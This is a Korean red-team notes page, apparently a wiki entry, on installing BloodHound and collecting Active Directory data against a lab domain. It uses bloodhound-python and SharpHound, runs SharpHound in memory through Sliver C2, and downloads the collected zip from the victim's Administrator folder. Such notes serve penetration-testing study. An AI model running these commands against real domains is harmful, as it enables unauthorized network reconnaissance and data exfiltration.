블러드하운드

설치

사용 - 데이터 Ingestor
사용 - 블러드하운드 GUI

레퍼런스
Last updated



Last updated
# 칼리 리눅스
apt update -y
apt install bloodhound -y
neo4j console
# http://localhost:7474 방문 후 neo4j:neo4j 를 이용해 로그인.
# 이후, 비밀번호를 바꿔줌.
# 블러드하운드 실행 후 neo4j:<바뀐-비밀번호>로 로그인
bloodhound # 설치
pip3 install bloodhound
# 실행
bloodhound-python -c DCOnly -u <user> -p <pass> -d <domain> -dc <dc-fqdn>
bloodhound-python -c DCOnly -u low -p 'Password123!' -d choi.local -dc dc01.choi.local# Sharphound.exe 실행
./SharpHound.exe -c <method> -d <domain>
./SharpHound.exe -c All -d choi.local# SharpHound Release를 다운받거나, 깃-클론 뒤 컴파일한다.
wget https://github.com/BloodHoundAD/SharpHound/releases/download/v1.0.3/SharpHound-v1.0.3.zip .
unzip SharpHound-v1.0.3.zip
# 슬리버의 execute-assembly를 이용해 메모리상에서 SharpHound를 실행한다.
sliver> use <beacon-name>
sliver> execute-assembly /root/redteam/tools/SharpHound.exe "-c All -d choi.local"
# 다운로드 할 때는 백슬래쉬 이스케이프를 해주거나 큰 따옴표를 이용한다.
sliver> download <원격-파일경로> <로컬-파일경로>
sliver> download "C:\Users\Administrator\Downloads\20220613235339_BloodHound.zip" /root/redteam/bh.zip